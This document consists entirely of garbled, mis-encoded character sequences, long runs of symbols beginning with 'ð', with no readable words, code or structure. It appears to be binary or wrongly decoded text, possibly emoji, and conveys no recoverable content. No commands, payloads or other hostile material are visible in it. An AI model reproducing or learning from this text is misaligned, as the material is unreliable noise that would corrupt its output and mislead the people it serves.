ðððð¯ðð€ðšð«ðð©ðð¯ððððððŸð¯ððð§ððŠððœðð®ðððœððð€ð¯ð§ððððððœððªðð£ðððð¡ðð©ððŸð¯ðððŸððŒðð£ððððð§ð°ðð¡ð¹ððð€ðð°ðð¢ðððð¥ð¹ððð€ð¬ðºðð£ððšðð¥ð§ ð£ðð¢ð¬ððð€ð«ðððœðð«ðð€ð°ðððŒððªðð¡ðœðððŒðšððð€ðð
ðð±ðð®ðð€ðšð§ððšð£ðððð£ððð±ð£ððð¢ððððœð ðððŸðœð¡ðððð°ðð¢ððŠðð£ððððð¹ðððŒðððð¡ððŸððšð
ðªððœðð ðð©ððððð¯ðŠðð€ððŸðððððð¿ð¹ð©ðððð®ððð§ðœðððœððð¢ð§ðšðððð¢ððšððªððœððððŒðððð©ðªð¯ððšðð©ð
ðððððªð¹ððð€ð§ð®ððŸðð°ðð¥ð
ððð£ðððð£ðð®ððšðð«ððŸðœð£ððœð§ð§ðððð¢ððœðð«ðð¢ððððððªðð§ðððð£ðœð©ððœððððªð¹ððð€ð§ðŸðð©ðððð¥ð
ðððŸðð§ðð€ð«ð®ðð£ðð¯ðð»ðð ðð¢ð£ð«ðð¢ðð¢ððððªðð£ð
ðððœðððð¡ðœðððŸððððœððððœððšðð¢ðð¡ð
ððð°ð ð£ðð¡ððð¯ððð£ðððð£ððšðð¢ð«ððð£ðð°ððšðððð©ðððð¡ððððð¹ð¿ðððð¢ððœðð©ððŸðððð±ðð®ððð§ðšðð¢ ðšðððððððŸðððð¡ð¹ðð
ðœððð
ðð
ððð¢ð§ð°ðð£ððªðð€ðŒð¯ððŸððððœð§ð±ðð£ððððšð
ð©ð
ðð
ð ðð€ð«ð¬ðð£ðð¯ððŒðšð¿ðð¥ðð
ðð€ð¯ðððð
ðºððœð£ðªððŸð°ððð€ð¯ððð©ð«ð§ðð¢ðšð©ð
ðððððšð§ððð¡ðžð®ððœð
ð«ððððððð§ð»ððœðð¢ðð€ððŸððŒð£ðððððððððŠððððŸðð€ðœð¢ðð¢ðð¿ðð©ð¬ððð£ð
ð¿ððœðððð£ðð±ðð¢ððððŒð¬ððððð ðð¿ð¹ððð¡ðð«ððšðð«ðð£ð£ðððŒð¬ððð£ðð®ððœðð®ðððœðððœðð±ðð¢ððšððŒð§ð®ðð¢ð«ðððð§ððð¡ðœðððœððªð ðœðð ððªððððð§ðððšððŸðð¿ðððð€ðððð€ð¯ð®ðð£ðð°ðð»ð¹ððð±ðœððð§ððªððððŸðð¿ðððð€ððŸðð»ðœð¢ððð
ðŸððŸð£ððð©ðð«ðð©ð«ððð€ððŸððððððŸð¯ðŠðð€ð¯ð®ððððšðð€ð°ðððŸðððððð®ðð£ððªððœðððð©ððððððð
ð€ððŸððœð§ððððžð±ðð£ðð«ðð€ððð
ððð¢ðð£ððŠððð«ððððððð€ð°ð¡ððð£ðªððððŸðð©ðŒð°ððŸðœððð¢ð¬ ððððð©ðððšðððð
ðððªð¹ððððð¢ððšððªððŒððððŒð§ððð£ðððð£ðð©ðð¥ð
ððð£ððšððð¯ðððŒðšðððœð£ ðððªðð©ðððœðððšððªðð£ðð ððŸð¯ð®ððœðððð©ðððð£ðð¢ððŒððððððŸððœð£ð©ðð£ð
ððððŠð©ðð€ð¯ðŠðð©ðððð¢ð¯ððððððð±ððŸððšðð«ððœð
ððð§ðððð€ðšð®ððšð£ðððœððððŸðð§ðð¢ðð®ððœð£ðªðð»ððððð§ð¯ðð€ð«ð§ððœðð«ðð£ð£ðððððšðððžð¯ðð©ð
ðœððœðð ðð©ðð©ðððð«ððšðð©ð
ððððð¥ð¹ð§ðð€ð«ð®ðððð«ððŸðœðððððð ð€ð«ðŠððšðð±ðð¥ð¹ððððð»ðð¡ðœðððŒðšððð€ð£ð
ðð£ððšððð¯ðŠððšðð«ðð£ððððŸðððð£ððŸððšðððð¥ðððð¢ð§ð±ðð§ðð«ðð©ðœððð¡ððððªððððððŸððšð
ðððŸðððð€ð¯ððð€ð§ðððšððŸððœððððð£ðšðððð®ðððð«ððœð
ðððð¹ð«ðð©ð¯ððð©ððððð¹ððð¢ðœð«ðð¡ððððšððªððŸðð£ðððð©ðð£ðð®ððšð£ððð¥ð
ðððŸð¯ðšðð¡ð¹ðððœðððð¢ðððð£ð§ððððð§ððœððªðð»ð¹ðððªðððððððð©ð
ð¿ððœð§ð
ðð€ðð±ððð§ðŸððšðð°ðð¢ðððð±ðððð£ðð¡ððœðð«ðððððð»ðœð¿ððšððŠðððð¿ððŸððððŸðððð¡ðœðªðð£ð§ðŸðð£ðððððð®ððœðððð©ðœð©ðððð¡ððŒðð ðð£ððŠððœððŒðð€ðœð¢ðð¢ðð±ðð¢ðð®ððšðð¯ðð¡ð
ððð¢ðððð©ðšððððð©ðð€ðððð¢ððððð§ðšðð§ðšðªðð¥ðœððð¥ð¹ðªðð€ðªðšððœðð«ð
ððððð§ð§ððððªð¬ðð€ðððð¥ðððð¢ððððšððŸððœððªððŒð¬ððð£ðð©ððšððºðð©ðð¯ððð£ððð©ðððð¢ððŠðð£ðð«ððŸðœð
ððð§ðððððŸðð¢ðšððð¢ð§ðððšð§ðððŸð¯ðððŸðððð£ððððð§ð©ððð§ðŸðð€ðððð£ð£ð ðð©ðððð£ðð®ððœððððŸð°ððððð¿ððð
ð¢ððŸðð©ð
ððððððððððð¢ðð£ðððð€ððððªðžð¯ððððŠððšðð¯ðð¥ð
ð¡ðð£ðððð¢ððððœð¢ð°ððªðððððð°ðð£ðð¢ðð©ðŒð±ðð£ð§ðððð¹ðªðððððððð¬ðð£ðð ððŒð§ððð€ð¯ððð©ðð¯ðð¥ðð£ðð§ððªðð¢ððªð
ðð§ðððŸð«ððð£ð§ð§ððð«ðŠðð¢ðšððð»ð
ðððœð§ððð±ðœð¢ððŸðœðŸððŸðððð§ðððð£ððºððð£ððð¥ð
ðððœðð©ðð€ðªðšððšðððð¥ððððœð£ð«ðð¢ððºðððšððð¡ð
ðððœðð©ðð§ððððšððªðð£ðð
ððšðððð£ððððð
ððð¥ðððð£ðððð¢ðððððð©ðð€ð§ððð£ð£ð¬ðð©ð¯ððð£ððððŸððððŸððððŸð¯ððð ð
ð©ððœððððœð§ð¬ðð»ðœðððšðð°ðð¢ð£ððð£ð§ððð£ððºððœðððð€ð«ððð¢ð§ð°ðððð®ðð§ðšð¬ððœð£ððð¢ðððð± ðœðððšðð¬ðð€ð¯ðððšððððð§ðºðð§ð¬ðŸðð£ððððð£ððð€ðšðððð§ððð±ðððððð«ðð©ð§ððð§ðšðŸððœðððð¢ ðð©ððœðð®ððŸðœðŸðð€ð£ðððððšðð€ð¯ð¡ððŒðšð¿ððð£ððð©ðððð€ðªðšððð£ðððŸðœððð€ð¯ð±ðððð¬ðððð«ððœðððð¥ðð®ðððªð¯ðð¢ð¬ðððœð§ðððð¹ð©ðð€ð§ð¹ðð©ððŸðð¥ðœðððŸðððð¢ðð®ðððððð¢ðððððð¿ðð§ððªððŸððððœððððŒðððð£ððððšðð«ðð€ð«ð
ððšð§ððð¡ððšððšððªðð¢ðððð€ðððð€ð¯ðððœðð®ðð£ð§ð£ððšððððšððŠðð£ðððð¿ð£ðððªððšðð£ððððšðð¬ðð£ðððð±ðððð€ð¯ððð©ððªðð¥ðð£ððªððšðððððð£ðð©ðð€ð«ððð¢ð¬ðŸ ðð©ðšðŸðð§ðšðððœðððð¢ðððððð¢ððð
ð©ð
ððð ðð¢ð§ð«ðð£ððºðð©ðð¯ððŒðð ððŒð§ððð€ðšððððð«ð
ðð
ðððð£ð¬ððŒððºððŒðšððð»ð
ðððœðð©ðð£ðððð©ð
ððð£ðððð©ððŠðð¡ð¹ð¢ðð€ðð«ðð¢ðððð©ð¯ððð¡ððŠðð£ððª ðð¿ðððððð¿ððŸð«ð¢ððŸðð¿ððŸð°ððð¢ðððð¢ððððð
ð«ðððð ððšðððð¢ðð¢ððŸðœððððð ððœðððð£ððððœðð¿ ððŸðœðððð§ððð€ð¯ð¢ðððð¿ððªð§ðððœð§ððððððð¢ðšððð€ðœðððœð§ððð£ðð§ððððððœððððð£ðšððððª ððšððððŒðððð¢ðð¬ððððŸðð©ðœð©ð
ðððððð§ð°ðððð¯ðð¢ð°ððð£ððððð°ðªðð£ðð¯ð
ðœðð¯ðððð
ðð£ð§ððð§ððºððœð£ðªððŸð°ððð£ðð©ðð€ð«ð§ððšððªðð»ðœðððªðððððððð€ðœð¿ðððððð¢ðð§ððð§ðððšðð¯ðð¥ððð ððððð¡ðœðððšððŸðð€ð«ððððð¿ðð©ð¯ðŠððšððœðð£ðððððð¿ððšððððŸðð¿ðððððð¢ðð¯ððððŠððšððŸðð¥ð
ð¡ðððððð¡ð
ðŠððœð£ððð£ðð¡ððð¹ðððððŠððŸððŸðð»ðððððœðªðð¡ðœðªððœððððŸðœððð©ððððððððšðððð¥ðð¢ððŸðððððð®ððœð§ðœððŸð«ððð£ð§ð±ðð§ðð®ððœðððð¢ððððšðð«ðð§ðððð€ððŸðð¢ð¬ð ððŒð§ðððšðð¢ ð
ðœðð¯ðð¥ðððð€ðððð€ð¬ðºððœðð«ðð¿ðððð£ð§ð§ððŒððŸðð§ðšððð¢ð£ððððð±ðð£ððððœðð¬ðð£ððððšð§ðððŸðšð«ððð
ðªððªð§ððð©ð¯ððð€ð¯ðððœððšðð¡ð¹ððð€ðððð€ð¬ððð£ðð«ððœððððŒðððððð®ðð£ðð¬ðð£ððð ðªð¹ðððð¹ð¢ð
ðœðð°ðð£ðððððððð¢ððððœððððŒðððððððð¢ððŠðð©ððððœð§ðððªðð©ðððšðððœð§ðŸð ðœðð ðð±ððððœðð±ððð
ðŸððð£ð£ðð±ð£ðŠðð€ð«ðªð
ðœðð°ð
ðð°ðððð§ð§ðððð¢ððœððªððŒð«ðððð§ðððšððŸðð©ðœð¿ððœððððªðžð±ðð€ð¯ð¢ððšðŒð°ððððððŒð¬ð§ðð€ð¯ð®ððšð£ðªðð€ðœððð£ððððð«ð¢ððœððªððœðððððð®ðð§ðððð©ð
ðŒðð£ðððð©ððððšðððððð°ðð¢ðððð¥ð¹ððð€ðšð¥ðð£ððððŒðð¢ððð¬ððð©ð«ðŠðððð©ð
ðð£ðððœ ððªðððœðððŒðšðððŸð¯ðððœððððð¯ðŠððšðð¯ððŒðððð€ð¯ððð£ðð
ððœððšðð¥ð
ð¡ðð¿ð¹ðððšðð®ððððªððð§ ððð¥ðððð»ðœðððœð
ð¬ðð£ðð ðð©ððððœðð®ððšððŸðð¢ðððððð©ðð€ð«ððð£ðð©ðð¥ððððð£ð«ðð€ð§ððð©ðœð©ðð€ðððð¡ðœððððððð£ðð«ððœð
ð ðð§ð§ððð£ðð®ðððŒð®ððð
ððð¢ðððð€ð¬ðºððšðð«ðð±ðœððð£ðð§ððŒððŸðððð©ðð»ð¹ðððªððšðð©ðšððððð¬ðð£ð§ðððšð§ðŠðððœððð©ððŸðð¥ð
ðððððŠððð¯ððð£ðð¯ðð¢ð
ððð¢ð£ð«ðð£ððªððŸðŒð°ððœðððð©ðððð€ð¯ðððŸðð¿ðð¢ð¬ð
ðð¥ð¹ððð£ðð¢ðð©ðœð©ðððððð€ð¯ððððððð£ðð¿ððŸðœðð ð¢ð§ðððð¯ð¢ððšðððð»ððððªð¹ððð¡ðð
ððœðð¬ðð€ðððð¿ð¹ð®ðð€ð§ðððšððŸððœðð£ðð±ð£ððð£ððððœðð¯ððŸð«ððð§ð§ðððð¬ðððððªðð»ð
ððð£ð§ðªðð€ð¯ððððð«ððœðððð§ðœð«ðð£ðððð©ðŒð¯ððŒðððð©ðððð€ð«ððð£ð£ð©ððœð
ðððð¹ðœððððŠðð§ðšððð¥ð£ðððœð§ð©ððððœðð£ðœðªððœðð ððŒðð±ðð£ðð¢ðð€ðððð¥ððððŸðððð¡ðœð ðð£ððððŸð°ðððð§ððð€ð¬ðŸðð€ðððð£ððððšð§ððððð®ðð£ð§ðœððŸðððð¿ð¹ð¬ððð«ðððšðð«ðð¢ððððŒð§ðððð«ð®ððœððªðð¢ð«ððð¢ðð±ðð§ðð«ððŒð§ð®ðð£ðœððð¥ððððððœððððªððœðð ðð±ððððð¯ð¢ð
ðœððŸðð£ðððð€ðððð¢ððªð
ðœðð©ðð¢ð
ððð»ðœð±ðð€ð§ðððŸðŒð°ððœð¹ðððŸððŸððððŸððððªðð€ðððð£ððœðð€ð¯ðððð£ððð¢ðððð©ð¯ðððð§ðªððœð£ð©ðð»ð
ð
ðð£ð§ðððððððšðð®ðð¢ð£ððð¥ððððð¯ðððŸðð¿ðð£ðð ðð¥ðžð±ðð¢ðð«ð ðð
ððð¥ððððªð¹ðŠððð¯ððððð©ððªðððððð«ðð©ð¯ð¢ðð£ððŸððœððððŸðð»ðð§ðð¢ððšðð«ððœððððªð¹ð¬ðð©ð«ð¢ððšðð°ðð¡ðððð€ðððð¥ð§ð¹ððœððððªðð¡ððððððððŠðððð¯ðð€ððððð¹ð»ðð¡ðžðšððšððªððŒð°ðððŸð¯ðððð§ð¯ððšð
ðððœðððð£ðððð£ððð
ðœðð°ððŒð°ððð»ðœð¿ðð§ðððð©ðœð©ðð¥ðððð£ð§ðªðð§ððŸððšðð«ððœð
ð ððœðŒð¯ðð€ðšð«ðð€ððœðððð
ðððððð€ð«ð®ððšðð«ððð
ððð€ð¯ðððŒððŸððœððªðð¿ðððð±ðžðšðð€ð¯ðððŸððŸððœðð
ðð£ðð±ððð«ððð©ð
ð©ð
ðððððŸððŠððððºðððððð€ðœðððð£ð«ððŸð¬ððððð«ðð¥ð¹ðððšðððððð ððšð¢ð±ððœðð
ððð®ð§ððð¹ðððšðð°ðð¢ððððŒðððð¢ððŠððœð§ðŒðð€ðœð¢ððšðððð€ðšð§ðð€ððœðð»ðððð¢ðŠð®ðððœðªððšðð©ððœðððð€ð¯ððððð§ðððœðŸððœðð£ðð¥ð¹ðªðð¡ð¹ððð£ðð¿ððœððððœð§ðšððð§ðððšðð±ðð¿ðœðððœ ð§ððð¡ðœð¢ððððªððŸðððð£ðððð€ðšð«ðððð°ðð¢ððððŸðððð¢ððððœð£ð©ðð¢ð«ð£ððŸðð°ðð£ððŸððœðððð¡ ð
ððð¥ðð®ðð¡ðžð¯ðð©ð
ðŸððœððððšð§ððð£ðððð©ðð°ðð¢ðððððððð¢ðð®ð
ðœððªðð¿ðððð¢ð£ð«ððšððŠðð€ððŸððŸðððððð¯ððšððððŸððŸððŒð¬ð
ðð€ð®ðšðð¢ðððð©ðœðœðððð ððŒð¬ððð¢ðððð£ððªððŒð«ððð¢ð¬ððð©ð¯ ð¢ðð§ð§ð°ððŸð°ððð¢ðð©ðððšðððœðð©ððŸðœððð¥ððððð§ðððšððªðð¥ð
ðððŸðððð£ððððœðð¿ððŸð«ððð§ð§ððððð¬ðð€ðœð©ðð€ððððšð§ðððšððððŒð°ðððŸð£ðððð§ððð©ð«ððð§ðšð¿ðð£ðð
ððŒð§ð§ðð¢ððððœð£ðªðð£ðð ðð£ð§ðððððŸðð©ððððŒð£ððððð©ðððððð£ððððœðð ððŒðð®ðð€ð§ðððšðð©ð
ðððððªðððð¢ðð®ðð£ððªðð»ð¹ððð€ðððð¢ððŠððšðð©ð
ððððð£ð§ð±ðððœððð©ðœðœððœðð
ððšðð©ðððð¢ððšððªðð¢ðððð¢ð¬ððð£ðð®ð ðšðð«ððŸð«ð¡ððð¹ðððŒðð¢ðð£ð
ðœðð¢ð«ðððŸð
ð«ðð¢ððððœððððŒð¬ððð¿ð¹ððð¡ð¹ðŠððšððŸðð¿ð
ððð±ð£ððð€ð¯ððð£ðð«ðð»ð¹ðððð§ð±ðð§ððŸððšðð±ððœð¹ððð€ððŸðððððð©ð
ðŸððœðð
ððð§ð¬ðð€ð¯ðððšðð¯ðððððð£ðððð¢ððšððšððððŒð
ð£ðð£ð§ð¿ðð©ðšð§ðð¢ðšððð¢ðððð¥ðððððœððð£ð
ðªððœðððð¢ð§ððð¡ð¹ððð©ð
ðªðð¥ ð
ðððŸðððð£ðð«ðððð«ðððððððð¿ðð©ð¬ððð£ðððð€ðððððœððð§ððððŸð
ððð£ðð
ðð¥ð¹ððð©ð«ððððð«ðð£ððððð£ððð£ððŸððšððšðð¥ð
ððð¢ð§ðððððŸððšðð°ððœð£ððð£ðððð¡ðœðððšðð¬ðð€ð«ðððšððððœðððð§ðšðŸððŒððððªðððð€ð¯ð®ðð£ð¢ð®ðð¿ðððð€ððððð«ðŠðð©ðŒð¯ðð¡ððððœð§ððð©ðšðððšðð©ð
ðð£ð ððð¹ð©ðð¡ðœððð§ð¬ðŸðððððð¢ð§ððð€ðšðððšðð«ð
ðð
ð¡ðð£ðð¯ðð©ð§ð¬ððšððªððŒððððªðð©ðððžð¯ðð©ððŒðð£ððð ð€ððððððŸðð€ððªðð¥ððððœð§ðŠðððœð®ðððð¿ðððððð§ð¬ð±ðð§ðððð€ððððŒð°ðððððððððððŸðð¿ðð ð§ð
ððšððšðð€ð§ðšððšðð¿ðð¢ðð£ðð€ðððð¢ððŠðð£ð£ððð¥ð
ðððŸððšðð¢ðððð©ðŒð±ððððððšðððð»ðœðððš ððððœððððŒð§ððððð§ðð¢ðšðŸðð¡ððððððððððšðð£ð£ð©ððŸð°ððð¢ð§ðððððªððœðð±ðð¿ððððŒðð©ðð¡ ðœð®ððšð§ð¿ðð£ð
ðððªðð«ðð¢ðððððð®ðððððð£ððªðð£ððªððšðð«ðð¿ð
ððð£ðð¬ðð£ðð¬ðð§ðšððð»ð¹ððð€ð ð©ðð§ðððð©ð
ðœððŸðœððð¥ð¹ððð¡ðœð¢ððšðð°ðð¢ðð ðð€ððððð
ð¹ðððð«ððŸð«ð¢ððð£ð«ðð¢ððŠðð©ðð©ð
ðð£ ðððŸðð§ðð±ðœðððšð§ðŸðð£ððððŒð§ððð¢ððððšðð¯ðð¥ðð¢ððŒð¬ððððð
ðððð®ðð¢ð«ð¡ðð¢ð¬ðœððð¯ð¢ðð§ð§ ð°ððœðœðððð§ððððð
ðððð©ððŸðððð¢ððððð§ð¯ðð€ððªðð£ðð¡ðððð©ððððªð
ððð«ððŸð«ððð§ðð©ðð€ðª ð¬ðð€ðð¿ðð¥ðœðððð§ðððŒðð¯ðððð«ððŒð¬ð ððð¢ð®ðð£ðð«ðð©ðð°ðð£ðððð£ððŠðð€ð¯ð®ðððð©ðð¥ðððð£ð£ðª ðð©ð¬ðððšðð¯ðð¢ððððððªððŸð¯ðððšððððœðð
ðð£ððŠðð¢ðððð©ð
ð©ððððððªðððð¡ð
ðŠððððŸðð±ðœð ðð¢ð¬ð±ðð©ð«ððð©ðððð¥ððððððððð¯ð¢ðð£ðð¬ððœðð
ðð€ð®ð§ðððšð®ððšðð°ðð¥ððððððððð§ðŸððšð§ðð ð£ð
ð¡ððŸðð§ðððððððŒð®ððœðœðððŸð
ðªððððœðð§ðšððð£ðð ððšð§ðððð§ðšðð©ðð¯ðð¥ðð¡ðð¢ðððð€ð¯ðððœð§ðœððŒðððð¢ð§ð°ðð§ððºððšðððððœððð¥ðððð€ðªðšðð£ððªðð¢ð¬ððð¢ðð¬ðð€ðšð«ðððð°ðð£ðððð£ððŠðð£ððððšð§ðððœðð
ððð§ð§ððððŠðð£ðð®ðð¡ððððšð§ð©ðð¢ðð¢ððŸðð¿ðððð ðð¢ðððð€ðšð«ððð
ðªðð¥ðð¢ðð£ð ððð¢ððºðð£ððªðð€ð«ððð¢ðð°ððððªðð€ðŒð±ðð£ð£ðððŒððªððððððŸðð¿ðð€ð«ðððð¢ð°ðððšð«ðð©ðœðœððð£ ððð¢ð§ððð§ððºððœðð«ððððððð¬ð±ðð¢ððªðð§ðšð«ððœððððªðððð»ðœð¢ððšð§ðŸððŸð¯ððð€ð¯ðððð¯ðððð
ðŸððœðððððððð¡ð¹ð®ððœð¢ð®ððŒð«ððð£ð§ð±ðð§ððððððªðð»ð
ððððððð£ððððŸðœðŸððŸðð
ððŒðð§ðð€ð¯ððð©ðð¯ððððððŸðððððœð®ðððð©ðððœðððð§ð°ðð€ðšðŸððœðð«ðð»ðððð¢ð¬ððð¡ðžð¯ððœððšðð£ð§ðððð¹ ððð£ðððð€ððªðð¥ð
ð¡ðð€ðð§ðð¡ðžð§ðð£ððªðð€ð«ððððððð©ð¬ððððð¿ðð¿ð¹ððð¿ð¹ððð©ð¯ð¢ððŸðð¿ðððð
ð ð¥ð¹ððð€ð§ðšððšðð°ðð£ððððœðððð£ððŠðð£ððªðð¥ððððððððŒðð¢ðð£ððœðð£ððððŒðððð¡ðœð¢ððœðð¬ðð¢ ð°ðððððððœððððšð£ðððœðð£ððððšðð£ððððœðð©ððŸð°ðððð¹ðªðð©ð¯ððð©ðððð¡ð
ððð¢ððððððððš ð§ðŸðð€ð£ððð£ððððšðð«ðð§ð¬ðŸðð¢ððððŸðððð€ðšðððœð£ð©ðð¥ð
ððð€ðð°ððð¯ðððœðððð¥ð£ðððšðððð£ ðððð©ð
ððð£ðð
ððšððððð§ðŸðð©ð
ð©ðððððððððð€ð¬ðºðð£ðð¯ðð¿ðððððð«ððšððŠððð
ðŸðð£ðððð¿ð¹ ð±ðð¢ððªðð£ð§ðŒðð¢ð¬ððð¿ð¹ððð£ðððððð¯ðððððð©ð¯ðððð¬ðððœð£ðððŒð«ððð£ðð±ðð¢ðððð§ð§ð®ðð¢ð£ððð©ðð§ðððððð¢ðšððð€ð«ðððŒð§ðððð«ððð§ð¬ðªðð¥ð
ðððœðððð€ð¯ððð£ðð°ð
ðððððð§ðððððªðð€ðŒð¯ ðð»ð
ððð¥ððððšðððð¢ð°ððð¢ð¬ðððœðð«ðð€ð¯ð¡ððŒðšðŸððð£ððð£ð§ððð€ðšðððœðð¬ððŒðð£ðð£ðððð±ð
ðŠ ðð§ðšððð£ð§ðððð§ðððððððœð
ð«ððœðð ððŒððŒðð€ð§ð¹ðððð¯ðð¿ð
ðððð£ðððð§ðððœððŸðð»ð¹ð¢ðð£ððð ðð¬ðððŸðð©ð
ðð£ðððœðððð¢ðð©ððšð§ð¿ðððð
ððŒððððð¹ðŠððšðð°ðð¢ðð¡ðð¢ððððð«ðððœð¢ð°ðð±ðœððððð§ðð¢ððððððŸðððððððŒð§ðððšððð¢ðšððð¢ð¬ððð©ðððððšð§ððšðð¯ðð¥ðð
ððœðððððð«ðð£ðð¿ððŒð°ððð¢ð§ð§ðððð®ðð£ðððððœððð¢ððððŒðððð©ðœðŸððŒð¬ð ððŒðð±ððšðð¢ðð€ðð¿ðð¥ðððð£ð§ðŠðð€ð¬ðºððšððððŒð
ð
ððœð§ð§ðð§ðððð§ðšðªðð¢ðððð±ðð¿ðð¢ððððœððªððœð§ððððŠð±ððð«ððððð¯ðð¿ðð¢ðð£ðð§ðð€ð¯ð®ðððððð£ðð¡ððð§ððð©ð¯ðŠððœððªðð£ððððšððªððŸð¯ðððšðð«ðð£ð
ð
ðð¥ðžð®ððð§ð¯ððœðð«ðððð¡ððð¯ððð ð«ð©ððœðððð£ð
ð¡ðððð°ððððŠðð©ðððð£ðððððŒð§ððððððšðð¬ðð£ðð ððð§ðððð¯ðððšðð¯ððððððð£ðððððŸðð£ððððŸð°ððð¢ðð°ðð¥ð§ðºðð£ððœðð€ððððð§ððð±ððððŸðœðŸðð£ð
ððð£ð§ððð€ð§ð¯ð
ðœð£ðððð£ ððð©ðððð§ððððœðð©ðð€ðœððð€ð¯ð°ðð©ð«ð§ððŸðð¿ðð¥ð£ðððœðð¿ðððððððœðšðð£ðð
ðð£ðœðªðð€ð§ð¹ððœðð°ðð¢ðððð€ððŠðððœð®ððœððªðð€ðœððð¢ðšð¬ðð€ð«ð¢ðð€ððððŒð°ðððšððªðð¢ððððšð§ðððœðð
ðð©ð®ð§ðð¡ðœðŠð ðšðð«ðð¢ðð¡ðð©ðððð£ðð
ððœðð¯ðð£ðð¢ððšðð¿ðð¢ððšðð£ðð«ðð±ðœðððšððððððŸðð¢ðšððð€ð£ðððððððð«ðððð
ðªðð¥ð
ððððððððªðšðð£ðð°ððŸð«ððð»ð¹ð¬ðððð¬ðð©ðœð©ðð¥ðððð±ðœðððŒðððð£ð§ð¿ðð£ð
ð
ðð€ðððð£ðð®ðð©ðð¯ðð¥ð
ððð¢ð¬ðŠðð§ððððšð£ðªðð€ðœððð£ð§ðððŒðð§ððšðð®ððŒð£ððððð»ðð€ðšðððððððœð§ðððšð§ððð¡ð¹ð¢ððšðð«ðð¢ðððð©ð¯ððððð®ðððð©ðð€ðœð ðð£ðœð«ððð¬ðððŸðð©ð
ððœððððœðððððªððð
ð«ðððððð¿ð¹ð«ðððð§ððœðð°ðð¢ðððð¥ð¹ððð£ðð®ððšð£ððððððð¢ðððð§ðð¢ðð©ððŸððŸð°ðððšðð¿ððððððš ð
ð¬ðð€ððððšððððð«ððð©ððªðð¿ð
ðððŒðððð€ðšððð£ðð©ððŒð°ððð¢ð§ððð©ð§ð¬ððððªðð¿ð§ðððŒðððð¡ððŸ ðð£ð§ðŸððŒð¬ððð§ððšððšððºðððð¯ððð£ðððŸðððððªðšððœððªðð¥ððððð¹ððð©ðšð§ðð€ðððð¢ð£ðððŸðð± ðð¢ðððð€ð
ðœððœðð ððŒðð§ðð£ðð±ððœðð¯ððœð£ð ðð£ððŠððð¯ððððððð»ðððððð¿ððð¯ð¢ððŸðð«ðð€ð°ðð ððœððð§ððððð
ððð€ð£ðððªðžð¯ðððð§ððšðð¿ðððð¡ðð¢ðððð€ðšðððšð§ðððŒð°ððð¢ð¬ð¿ðððð¢ðð¢ðšððð» ððððððªðð¡ððœððœð
ðððœðððð¥ððððð«ð¢ðð©ð
ðŸðð¿ð
ðððªððªðð¢ðð®ððœððððŸð°ððð±ðœðððð¬ð®ðð£ððœð
ððððð¢ð§ðððšðððð©ðœðŸðð£ðð
ððð£ððð€ð§ðºðððð°ðð¢ððððšð§ððð€ðšðððœð£ð©ððŒð
ðððŸððððð§ ð¬ððŒðšððð»ð
ððð£ðððð€ðšðœðð€ðœðŸððœððððšðððð¡ð¹ððð€ððŸðð¿ð
ðððð¹ðððð§ððððð°ððŸðœðððð£ð¬ðð©ð¯ðððŸðð©ððœððððœðð¿ðððœððððð¬ðð£ððððªð¹ððððð¢ððšðð¯ððð£ððð€ð¯ððð€ð¯ðððœð£ðšðð£ððð ðððšðððšð§ððœðð¯ðð£ðððð£ð§ððð»ðžð¯ðð©ð
ðœðð€ððððšðððððšð«ðð©ððªððªððððŸðððð¡ð¹ðð
ðœðð°ð ðœð
ððð»ðœðšððððŠðððððð£ðððð¢ð§ð¿ðð¡ðœð¢ðð¢ð¬ðððŸð£ððð€ðð¯ðð€ð§ðŸðððŒð®ð
ðððððŸðððð€ð«ð®ððœðð«ððð
ððð£ðð§ðð£ðððð£ððªðð¡ð¹ððððð©ðð¢ðððð©ð
ðŒðð€ðœðððšðððð¡ð¹ð¢ððšðð¯ðð¿ð
ð ðð€ðð§ðð§ð ðð
ð£ðð«ððŸð«ððððððð€ð¬ððð€ððŸððŸð°ðððŒððªððœððððŒðšððð£ð§ððð»ðððððððð©ðœðŸððð£ð£ððð£ ððð£ððŠðððððð€ðœð¡ðð¢ð¬ð¯ððð¯ð®ðð©ðððð¢ð§ððð±ðžð¯ðð»ððŸððšð
ð¬ðð€ðððððððð€ð«ððððœðŸððœðððð€ðððð¢ðððððð¿ðððððð¢ððððð§ðððœððœðð¥ððððšð§ðððððððšð§ðŸðð€ð£ððð¥ð¹ððð€ðšð§ððšðð°ðð¥ð
ð ððŒðððð¢ðð®ðð£ðððð¢ððððœð§ððððð¬ðð¢ðšðªðð¡ð¹ðððð§ð±ðð¡ðððððœðªðð£ððððð§ð°ððð§ðŸð ðšðð¯ððŒðððð©ð¯ðŠððð¯ððð£ðð©ðð€ð«ð£ðð±ðœðððŸð«ð¢ððœðð¿ðð¿ð
ððð¥ð¹ð±ðð¡ðœðððŒðšððð£ððððœððšððŸð¯ðŠððšðð®ðððð¡ðð£ð§ððð¢ððððœðð®ðð€ðœð¡ððð§ð¯ððð¯ðððŸðŒð±ðð£ðœðððªð¹ð¿ðððð
ðððð©ððŸðððð©ðð®ðð¡ð¹ð¢ðð©ðœðŸðð¥ðð£ððªð¹ðªðð£ððŸðððððð¿ð
ððð¢ð§ðððð§ð¬ððððœððœððððð§ð±ððŒðð¯ððšððªððœð
ð ððð¹ððð©ð«ððððŒð¯ðððððð£ðð©ðð¢ððšððð£ððð¢ð¬ð
ðð£ð£ðªðð©ð«ð§ðð¢ðšð©ð
ðð§ðððœð§ðªððŸð¯ððððŠð±ððœðð ððŒððððð§ððð©ðð¯ððŒð£ðððœð§ð§ðð§ððððœðððð¿ðð ðððð±ðð©ð¯ðŠðð£ðððð¥ðððð£ðð¯ððšðððððð¿ðððððð©ð®ð©ððððŠððšðð«ðð£ððððšðððð€ð¯ð®ððœð§ðœððŒð°ððð¿ð¹ðððððªðð©ðððð¢ð«ðððð¹ðªðððð
ððœðð¬ðð£ðð ððŒð§ðððð«ð¢ð
ðœððŸðð£ðððð¢ð¬ð©ðð¢ððªð
ðœðð°ð
ðð°ðððð£ð«ðð©ð«ð¢ðððððð¡ð
ðððªððð ð±ððððððªððœðð ðððð®ðð£ðð®ðð©ðŒð¯ðððððð£ðððð£ððŠððððšðð€ð°ððð£ð§ð¿ððð§ðŸðð€ðððð¡ðððð¡ ðð¿ððð¯ð¢ððŸðœðŸððœðððð§ðšð«ððð¹ððð©ð
ðªðð¿ð
ððð©ððððð
ðºð
ð£ððððœð
ðððð£ð¬ðð©ð¯ðððšððœðð£ð£ððððœððð»ðœð®ðð£ðð¬ððœððððŒð§ððððð¢ððšðð°ðð¢ð£ððð¿ð¹ððð£ððºð
